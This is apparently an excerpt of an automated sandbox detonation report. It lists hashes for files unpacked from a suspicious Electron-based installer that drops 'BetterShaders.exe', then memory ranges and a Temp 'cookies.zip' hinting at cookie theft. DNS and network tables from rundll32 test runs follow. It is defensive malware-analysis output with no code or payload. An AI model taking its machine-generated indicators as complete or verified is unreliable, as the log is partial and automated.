| SHA512 | c8600ae02234bbd846fdcdf8dbe270a0aae259a3615805a271117b04a9a2be52180520d855617c7709d694859c28fa63ec2c107ed90a4ecf84194d9717b2d278 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\es-419.pak
| MD5 | 0b2f21294e4ef0dc26b3101e3b050c15 |
| SHA1 | 6964d2e5f15767e771697488b67042ad4eb7f399 |
| SHA256 | 453f699a7fa645e0e1d3427e06e65c3626540c5f68e9469e1cc18dcd141c2245 |
| SHA512 | 54be2b630664ffdc02cfd58803a3e4d74edebcd814efbfc1530c777030291387f09bab5200f97951a47c70e6b1881146b798dbfc1deb2f953b9e91f3519c126e |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\es.pak
| MD5 | 2e163e56cce7f1a0feed489ead44923f |
| SHA1 | 6a1b40ce5c3f210ccc5f64383010fa4796e36df9 |
| SHA256 | ca83c63f335929fa300129c9661ec295a3d5749ee9edb0f36ba8da902ff6a6a6 |
| SHA512 | 509288b4324fb5f3e7a505aed4ea806d90fd437de52b2edf773187520c12b3d280020d90e98b0c091561da7e67c83b56846065a63d5f584cca95280a8e111c3c |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\et.pak
| MD5 | 23c45c6f09d13fea52fd88e366348caa |
| SHA1 | d82057e2ce05d123d859be488adc27074771c73c |
| SHA256 | d4111b9c6baaa2404ea5c20dfefca1dc892a244b26c420314ee467fa2822de5e |
| SHA512 | 0009c1c61839933db63e3bf73dac63453d7d5c94255da3c0650c9111424415c91bcf1f914be7ace119fe290c4aae9f282c6016a04c4082c881882b5c3f2d04e7 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\fa.pak
| MD5 | 5655e0036c0f7a656eb1320309d155dd |
| SHA1 | a38bb37d74b0de424c3df345a1fda68cfa916fb5 |
| SHA256 | 69454dbec49fa935ce242888de4614bf5f5321af5f26eebd3fd9a6c768652559 |
| SHA512 | 48473a81c4c611849efb531390fed7efe8f0204b45fa53ba4a1445c869c37ad49293316f00c3ca6147a44d87411aa528168528f36f52b782de3baeb372464845 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\fi.pak
| MD5 | 671cff3aa38e9810a6fdd11c91861acd |
| SHA1 | 6062122660beade0e00cb86d9e2c8abc274f9f59 |
| SHA256 | 3e69afb533da49338f036ad2c286c4193ce6b5a2476230dc4a1140cdaf03a6fd |
| SHA512 | 3127764aa594de149528b716ed135aff1e45a3fdf4a0a936b9240785812be2509f61d629c4dfae1759c87defab61e34203bf2a196381e87633d0fd02a1b76454 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\fil.pak
| MD5 | 4990033756bc1b2410e77a607bb62f8c |
| SHA1 | a02c0f347606bf50aa6f281e42d2d66ce6155299 |
| SHA256 | 3265ae5b6c16a09b1ec9ea53181de78df75e951c3ce28f33d4c483088a9ab37b |
| SHA512 | 3d45c6dd30eea6d6929039c0cdaa7bb6f7b665fe67fc7a5ca79567d4fd3f907011857e5cb43c16cce9c558d4f669618bc5378f05fa583b19360df58b12b5f913 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\hi.pak
| MD5 | 3751919d994ad0a1b9657b947945c5a4 |
| SHA1 | cdf66f0260e28076e56eedb07239e65cd195759f |
| SHA256 | d9979ea297325ae36f2a467b07d41e281f0b3a9a77373cbdf76200eaed2f48a7 |
| SHA512 | 8c161c5ff23cf35b6ec5c49481445d7cb978a8bafa5635d2dcdee435f73dd9bca994bdb51010223ded6c49089e5b4879ec3b4fe4a54f864fec00247c96678130 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\he.pak
| MD5 | 433eee3490a1ea856768856f11abb357 |
| SHA1 | f40c06dfe34cc21836c35b53310019265021abfb |
| SHA256 | 30a044df9a5c665a2653a90e1a5a3868b6a16861ca945e70da1a65892f4eff44 |
| SHA512 | 20893e629a067c6b92cd03a1e805c6aad857388d7556e36547ebf8b51facef330ac8a0954ff7222b406655bb9254536e2857b1bfcdb27e829eaa9199fdc1189a |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\gu.pak
| MD5 | 86b829b3cdcf383f11ffa787a32446a0 |
| SHA1 | c9f626a97bcf00541876caa7a49d23e0b84b83ef |
| SHA256 | 74c62dca0b7a310aa593d1dcca8b0b0b382b052837e7cae6b87cf05b8b346b1b |
| SHA512 | 72b69cc9846fb078a8c03afd60154a3b55bc828b9e13b5124a473c0ee528e3cb3ed67f67d7d763ec8e78883640c53d4c88a7a14552b851d493abf65e269353f8 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\fr.pak
| MD5 | e7ee691a2570b917483afabe167d79d6 |
| SHA1 | bfdb9a930223d2a7ca6e9c493e453990a8434a4e |
| SHA256 | 10c0b55e5935764f194f9d787fcdf03a6b87df23ae4a179deb5b9ba4451b0220 |
| SHA512 | 034807542dfce6b2e74a4f42c2923adeea3ac930688ebb1844f9650a4f8143b807a2a30b521bd6b131062fdf8425c77cf6a521c58bf10ba81dcd4e7274134c4d |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\hu.pak
| MD5 | 92995b10868e466811b909c9702f1727 |
| SHA1 | 6cd34086b876bf07dc1222cbd33e8fac60e401ae |
| SHA256 | 0a62d168c0f6d9d651dedb4e01be5b533b94e8617535cd70ad22717748fbbc64 |
| SHA512 | 412d0f253d31eff5819fc05ed0da6284a39cd5dbc3f8dac81153511c69aef9cd3f1170d3c6a74616e3d9c51bc457045e9715456b1ef50e139f68f667d5662f53 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\hr.pak
| MD5 | ee08edd61377c4d0aa6e1749ebe4cdb5 |
| SHA1 | a2ce9d5f682e0b61fc2a92d42a8f90a32c6ed70c |
| SHA256 | 86761c837293c3450e68905750d6888ad76cf7fea78d6468489c8ef156a444d6 |
| SHA512 | cb140f6955a3291543b419241b0c16f8dd757643d40a7241cfcf8f2bb4dfcbc495e38716f0a54c773e91bc27415cf8450e954386227f3bda81434b8331cd7296 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\id.pak
| MD5 | fb42de6be21c78da1b05c518c5625882 |
| SHA1 | 7d8d4e28ea196e3e48df4999d94a04c0be31de16 |
| SHA256 | d9fc19e683240404a60d57037f24e1d8b20cfda4c8bcacfed577b86cd8988517 |
| SHA512 | 63885e8c82dbef4902c75ae7bc4c3f953057236b07d6919bf3a9f8d1e6ec0ae2cb94cbe0366e56e1272653087faf2fb07b92b18bd312e8e1b38fc76ff5eb3922 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\it.pak
| MD5 | e25f7dcadda21b072cf012d3c23600f0 |
| SHA1 | f172e6bec3cdf58260ae2b265bb2d2c2024d3c2b |
| SHA256 | 53b018b82272a07929a3c4742d5217d81c49c54413010af3a9e8f3634d0ac361 |
| SHA512 | fb12276e9dca5ec27bc85137872e44f5dd1451ab9bc4f87a18e279a33de8eb694c77769a58041ec2a3bf2bc8e0ff5cc42595d6aa89b6b3542d6124515502415a |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ja.pak
| MD5 | e049505ad91c088b2bc6c11f478810f6 |
| SHA1 | 11ccc84a0cac8b14728997eab4529e2f365e55b3 |
| SHA256 | 014c329d7c5d55364b4fb237ef3b117272a53f7a7e5f0d0cb7b2861942a5345c |
| SHA512 | 51b983cbcad124687965afab566ce52fbab6d71b25022a377b091cc8f6b2435051fff70bf671df1d7e363ef64b80216cf64a6d05a472d55fbb3ba0ed29956bc6 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\kn.pak
| MD5 | 3c7b860c21dc86f7e62ed9033960a487 |
| SHA1 | 47e870d1d1f758a6d8ab6da227cfdd2ea55076cd |
| SHA256 | b2658ad69c7b761cd12fead16e52bbdf1f1731b2ab96e6948f356f373ca01a76 |
| SHA512 | 9820633cbad79f90699c5c2813ef08d28c6c1f2e496780288a710856189686a0e1de3e27f5333e35fb3bc30a6bc81b8bfc093bb0c59cbb039c7afa8814791378 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\lt.pak
| MD5 | 1bab0f6c08b1cb26db455aaf581490dc |
| SHA1 | 3a32246b812e8ed35ddf0a6842b8bf26b19be9d3 |
| SHA256 | 946351ed2d74f247dea0f2742fc36d89225355480f0cec99d71599ccce3ea9e1 |
| SHA512 | c6e4502fda62e2606e31a7c67679d59d21a04342c507e1fa39ac59156a4d1e1cab1923de4bcf30b735d5bcf89824d4283b57db11af9673b5b956c2f883a3bc7c |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ko.pak
| MD5 | 114ba02546a8662240b7ec23d101f47b |
| SHA1 | 7d6f10e25b6f4bde6659aa6d661a1139c3db539a |
| SHA256 | 43086597d703d66c410d099ca76dbb2f35835b605f93fe9a98342a08cdda5c0a |
| SHA512 | d1097da68e6cdfc5cb963e6e5d18da714f3a9f3d76ad064ab9197fa8e379eff502b7b01e7b332aa1ec0ed98157537d28c2b7db8530e512e3b5b784a56d19367e |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\lv.pak
| MD5 | e4993f39d6fa671658aa3ce037aec60d |
| SHA1 | 2db9bfc42b07060f6e256c74a01c348cd6c2ac0a |
| SHA256 | 1e6f9a40f4fa1206117063234399bd7c1e7d198cbf6c4ad633e5e18ad0929836 |
| SHA512 | 4192274330be238a93e370fc3fc8ada444b38fa1464889f0e3d0f6c5e548f7f7de14248937d45f8aa84c043078a69174ac1c9a5894fc9b4ff8f10deef6f77e5e |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ms.pak
| MD5 | c8d605a91b2b66603b379f5557783afe |
| SHA1 | d6f294eb91675182f658158ff9399592935c779a |
| SHA256 | 7707f79a2a4aec553e68af87802a0f19d3714a25311fb7b8afdc6ff4a5b6c5ff |
| SHA512 | a9f100dc1fe0a19a0a0a4360fff392af4e07eaed6613ab6dc61548d36afe55e4c9183e6584ca4e15feb477947ee8a79a96775718197129a555319a162281b9c7 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\mr.pak
| MD5 | b0e1f36587445f28f22777d555683a0f |
| SHA1 | 42f7cd3c596c2f52662b86df9d9096bf822a80f3 |
| SHA256 | a674db4e60152fc17a32d4b92add129adaebfc02a1a783a12653f984447c535e |
| SHA512 | 575fdea827497ceab51df5fc8783f960b87d180f6031f0947525279d224189a6299943df37a014f7bcefc637ee23327fb1ae82eb77c175d63c515b29947ac0d1 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ml.pak
| MD5 | 9f0422326953a0c48c1db82ca2a9d639 |
| SHA1 | 2305bc895e9ccc5b9a3d661e891c4f06d8a503ff |
| SHA256 | f2fb440eb0518dc695810fcb854b20b72aa47e5ffc75c803aacf05861d35a94f |
| SHA512 | a899dd975a56a53503b5cbc7448f54423b18bfbd917f73f0871840d6cf6a574bbaac8d735ae8de6a074cd78c43b6640e3e46be1550dcef8f8cfd1971cc1513d6 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\nl.pak
| MD5 | 525b638051d9ac36fa759039c17283c4 |
| SHA1 | c1922ba3bceae681b90064b60fcb85a7e6c944b1 |
| SHA256 | a2335c62cdd4875660e955b0d65d9e995946b1281ed7f34521d3ee01cedd643c |
| SHA512 | 680c18b6782f977c87ae0ecae9d1cc0e2590ad75d8146a5ee3e9b1dd9ed1081530f310e871bbd6dccbba42306d8f59778f202691e5690da1859e22d485fc75b5 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\nb.pak
| MD5 | d1e0429ab9ad3821bb0ad398eb3ea362 |
| SHA1 | ee4efa5aa14bb10e70f3542dbe0b256df6c99fcb |
| SHA256 | 5844a4a660e41045bf86dca31242e33a6c4726b8dbde15161261446d29ec7add |
| SHA512 | 5189abc6844372ed0c115c6ce341387514034dc2c54f068fe6b479d12ee76d5a727653fa0dabb2950eabff6e6f529c17cdd7ae822515d20b74889012d27f7032 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\pl.pak
| MD5 | 10659a05a7180f54fc46f122ab331052 |
| SHA1 | 968a0faea6eac3e82f694eb76d24228be58cb734 |
| SHA256 | 16e9adf63d98e00d0a5433dc9c08253c678d5e3ccdde11783da3c94e98f65e46 |
| SHA512 | b815ed62b10bc5abf8bfcaf3a1e42f821bdccb0ebfa6ac15dfb0d1246c71f613fb8c7f2f9f57001377ab5ef700406d0ce3c338fe4a41065d98398341021aad6c |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\pt-BR.pak
| MD5 | c3bc628628f8809ec2d18f997db6e540 |
| SHA1 | 14c6f0215b7895f2648813ad033b59242d058a13 |
| SHA256 | 6bb17174a3d061afe86cf901cca658793bccc53f7edd1cbde0b58fe90e71a9e8 |
| SHA512 | 73ca0eaf1f1a250bf50db5d1ae2f3b58c93289703ea85a7bb891463412a63ea8a88fbf19976d9fba637f99cca097fcefda773d2fcf07daf6f5a1d270597703a7 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\sl.pak
| MD5 | be05e8eea54a25cd15d807264f8aa284 |
| SHA1 | a63dc26044b31fb4e1a35b1f5778150d737ccfce |
| SHA256 | 63963e60a45495ff762f02e02fd42c723d7c482a44c07e50473cbf7ccdd73eca |
| SHA512 | 4163b3eeb5e55beacc53349cad6899e871d74109a50b28a001e98f0000cf6eb57d4e06f10a70557664f15f4456fbcbb80ac7dbd1174bd19a20975da108ef2dc5 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\sk.pak
| MD5 | 8e5ecfbf0ab9e00401f088489afed0c2 |
| SHA1 | a99df2ed2a00ade4cde178f73893b84aaee521cc |
| SHA256 | 25e0167d708a004e36e3c344e0209e979d42874122cae03ef2e2c5e110f39364 |
| SHA512 | 401ea003abfb4a32b52cfab912c2199800f54aabf1321802f973a9925f535d40cff9825832d98ca86eb3af794f64aa408dbbd99e2083f2e9fd0d02ec4debd301 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ru.pak
| MD5 | 4fb18b712580caa5cdff8c8cbe9e67f3 |
| SHA1 | 79bdeed0aa9bef9a8396a426e370b4022b09243d |
| SHA256 | bee87b5ef0ab61c05eb3ed4c43ba0900a75a853fdaef2218ffa1b2eaa4d29d21 |
| SHA512 | fd91fae4dfded1fcb6cc0e6a6da4caa123c8347d1a9eff33c0d5339aa9854dc07bbb3c84e1880f260eaf932a1a2af9784157d5656b29d661e20961f499b1e5b0 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ro.pak
| MD5 | 8c922129bfb61fe14fa035d965108823 |
| SHA1 | aa8d8dac978053163a303c1f1206480144d4b330 |
| SHA256 | 06c6486e8a42b447a55bd789bf2bc794354fa4be062139481e4612550f16c755 |
| SHA512 | 25f9c2b75febfe607cbdd872a82338aecb5f277ed2d3d80fe0ec01289e3361445102392ea23207658ac347a774a7f47bbe19672d49f080cd6aea220da5ac3618 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\pt-PT.pak
| MD5 | e4565bfa531c9c4344f84dc8be207c93 |
| SHA1 | 5d1084ad5bff80383129850a853fe1319c23199f |
| SHA256 | fcd194e5caf36be4958c559acbde4f28a957083bf2aceac893f9e5c9e65d8a95 |
| SHA512 | 531a318e8ef1683abe4bc7b44e7d3a4d6ef907d5e7ddfa1f5cea20414dd33060981afdb8d1f4813b05be90985f10fb892f9060f6c1f2b975984f12acc8cdce6a |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\tr.pak
| MD5 | 1e661df0ee32346b7816e1cec439e9da |
| SHA1 | 2bd38e0a4ec62f306aae932d8e448a0911a5a63c |
| SHA256 | 6c5dfdfe34c0f6b2b00364dbd7ef3c62fb0d71a163f9254a7b4b3624d66c4ec0 |
| SHA512 | ef49c1f329f00e2a9350e7a6e3789c6ea2c84026e541717e4d72ea3723ac29e9be3e0d4a82e36ccfab27365feceef0012c209c53e3b079148140e0f08f55de56 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\uk.pak
| MD5 | b11fcf5670f611e270552a51e8f4000a |
| SHA1 | c28630a621b77df7434fb016f5b1e50d456cf296 |
| SHA256 | 96f45509b52f046e70f3f61416b93ba8f2f5a0f06d7d849056161300a3ac6e5c |
| SHA512 | a6f357825e59c35f72d740ca23300b3e233be1949dc4c5c5a3a268f4e0194b0be839f95fc125d8527d851971952c09ac233b294002f43911c2599859d935e8c7 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\th.pak
| MD5 | 33dae3c79e7c1798eada31b70e3f2518 |
| SHA1 | c386f4babd6545c915dda9dfd4bcc8cae5ff6c86 |
| SHA256 | a88de31d7605a1c3eed2b5008cbf31de368d91fd57a543c995a3c2263144054a |
| SHA512 | a1d033f85ba340a8f6f3da1aaa15bb8b04abc1acca1e9554af04576f512d38e6088c406f3227e03239e741eab68fe3a83a0ee13aff3c51554fa7e41b1d42029d |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\te.pak
| MD5 | d251d089aa789bccc27a0b473d39e46c |
| SHA1 | 283d8fb6b6195b3427144773ffc4691c82e31f0e |
| SHA256 | 8dd7d206379445bd9afa4e01ab986c439cf70841d080fca6e152b453e94fcc49 |
| SHA512 | 27e6f13f6c7937c8121451d70ee90d2a2ce5e519d17e882a86b29a6a78764427022c36b6a99178e9933e01500b55bcbfd0dc79a6f028a046967c2c53f78424fa |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ta.pak
| MD5 | 088f7313392bd5bd898a984b434cee97 |
| SHA1 | bda9d5f5e87055674aecdb609a46a046bb0a6903 |
| SHA256 | e2868cbfde36485e8227ec24789a809ef4590f8841e5ee625cee154ba3701e78 |
| SHA512 | f8849d13924da2f5e3bb98f2aae19317d3f4260ec8e916ab88a91d6af97c9ba8fab929f91acb3b5575e30e87dda847f1192b6b2dc1d05341ce75a86a4fee8edb |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\sw.pak
| MD5 | 0787972a076c6690e7938758c2a92e24 |
| SHA1 | dbf02e5a3ae26acb060b533bb006756c19122bfe |
| SHA256 | eb96ab83e2e08e811928742590178e97454863bc581dd8574d6a644fd3c6615a |
| SHA512 | 9f3560a3b648b1a7025cd8a98c39ec7634883aade1ac2c7836fde890cc04bd009aa5c1bca8354ee1259ebcd9482326c51a7d21bdee3caf92984ecbefab35d34c |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\sv.pak
| MD5 | 8132fd35c20f775508f5440b7f3d6871 |
| SHA1 | 4e50c2b45c69e95f95f34398a7a4babc06420c1a |
| SHA256 | 867687296810c4a95a1876edd91ce08e57ff1894c9f22913808fee1d21362589 |
| SHA512 | e13ca94f6766a49a9b11a128bad1a5803c3ae9aaa9a8a536995eaf510da071995fa27b087fd3f14422cf21792a54b9527a1fe658947a446a6764b32a86479d3f |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\sr.pak
| MD5 | b1f52cd111da3b1ea1f31e082f15ba25 |
| SHA1 | 3f4f13a0d253e8fbcfc1fb93125feed51f03bc56 |
| SHA256 | 1410f7d93d53642ef9aa8dfd92497c923d71a97e419a6219c7bee7798c3561e1 |
| SHA512 | 2c0ae8d36c496d570d6e013f859caf655a74047a2a27b79ad0895eba5a46c0895d123d532b8bfa4370ce67caf6b874cb29d751fd025586bfafad0bb800b22144 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ur.pak
| MD5 | 7b5fed5150135b728bf8865246f7c8fc |
| SHA1 | 214b0f507ff6384b1b305f1718db43023499eeaa |
| SHA256 | a0c752a805da7dd6608ad04625734f4d27cb75b682f51b2dc8ef08350cc7a2cc |
| SHA512 | 81fc55db4b0635e09057fd060d9eb72bda5a5fd2d2e1e4284e1b45098b287c609526c766b030dd0eaebc0836a32bcbf6dc0aae94327c103f3f736b5cd051a8a1 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\zh-CN.pak
| MD5 | 8af3f2940137687b483ff2f4d9185b98 |
| SHA1 | 58ce1fcadd8ca27abd11f0614401a12a7e93b11e |
| SHA256 | 766f8ac9d4e06437fd3300608ad4d31228576dcaa1e164ccbc4333d56493e9fe |
| SHA512 | fe55fb3d0abab843e4ea1a33d590b3a9e885f6ea8a38cb8f651d090e8c5ea3400efd212502cac500ef26cc5d6b7a4a7cb66e4aee1a4bb13b97f0926ac99b16e0 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\zh-TW.pak
| MD5 | ca8bf0d267507545580758c81e9fb2c2 |
| SHA1 | 9ec7a2e731775bf3224317681847ffc54376702d |
| SHA256 | eb02d499aada4f358c0776c301416de758167ada695503c0e72135ee462fcdfc |
| SHA512 | d5322739253544d519d52aaf8a34fd0fcf3abcc49499e60d320265e85b173f49189d0f95c7ff67a9369400759830141bc342de7fb710cd047e8832070007716f |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\resources\elevate.exe
| MD5 | 792b92c8ad13c46f27c7ced0810694df |
| SHA1 | d8d449b92de20a57df722df46435ba4553ecc802 |
| SHA256 | 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37 |
| SHA512 | 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\resources\app.asar
| MD5 | e17391bf3cc98be5554b509c39908fb9 |
| SHA1 | 8f2e6726c940ce42df95a05c78385c824b4d560a |
| SHA256 | 7fbeab871461f743124788a03f048c21991e6f8cd165cf7af5ed87bf11126e3a |
| SHA512 | 998750ec0971f5aa7102253b38eb786dc3ba1f5ef9870a34ba7e4366cef37c04c15dca75467b17cfdb0b8c6950f042615ada8f6689d8cf8453460456133e67aa |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\vi.pak
| MD5 | b6174a2dd1e3f557cb99060fc3101063 |
| SHA1 | be115f1d2dc8135683a182ab5c09feab74a3c97f |
| SHA256 | b654478c2d28b97d821a75543a0494bc35548749fc3eeb6b33b08b4f5f4fd84c |
| SHA512 | ddbd38e7513f213b3603b1fbf16ad21fa34382cd11e33201cf579c2913a7b6e143a03bf12f11afb281a40c6948da9844b6c9d5ab372d7500184014e98ea74c19 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\StdUtils.dll
| MD5 | c6a6e03f77c313b267498515488c5740 |
| SHA1 | 3d49fc2784b9450962ed6b82b46e9c3c957d7c15 |
| SHA256 | b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e |
| SHA512 | 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803 |
C:\Users\Admin\AppData\Local\Temp\9de8b50f-df7b-4dca-843d-73f4cfc5c426.tmp.node
| MD5 | 3072b68e3c226aff39e6782d025f25a8 |
| SHA1 | cf559196d74fa490ac8ce192db222c9f5c5a006a |
| SHA256 | 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01 |
| SHA512 | 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_remtb3sv.bx4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2596-543-0x000001A3F9540000-0x000001A3F9562000-memory.dmp
memory/2596-550-0x000001A3F9A60000-0x000001A3F9AB0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f48896adf9a23882050cdff97f610a7f |
| SHA1 | 4c5a610df62834d43f470cae7e851946530e3086 |
| SHA256 | 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78 |
| SHA512 | 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 46d6c89b6a449ce91c1a3691c516e10e |
| SHA1 | dedf2c05d83a8fc311e39fa86af575866f9f7ece |
| SHA256 | f6841440d2949cf97fb621923a2f931fca567382856cb60fa4c8ce3f9b81e55f |
| SHA512 | bd222cc430c28abe832787973ed2a7a07d58d92f34eed1ebfe69fc4cd8ed59443ed93799979fd39d1b76ef6ff247f3ceb12b3c537de09ffba72ebec748f3e1cd |
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\cookies.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
memory/2536-618-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-620-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-619-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-627-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-626-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-625-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-624-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-628-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-630-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-629-0x0000028273950000-0x0000028273951000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win10v2004-20240426-en
Max time kernel
146s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 52.111.227.11:443 | tcp | |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win10v2004-20240426-en
Max time kernel
145s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win7-20240419-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
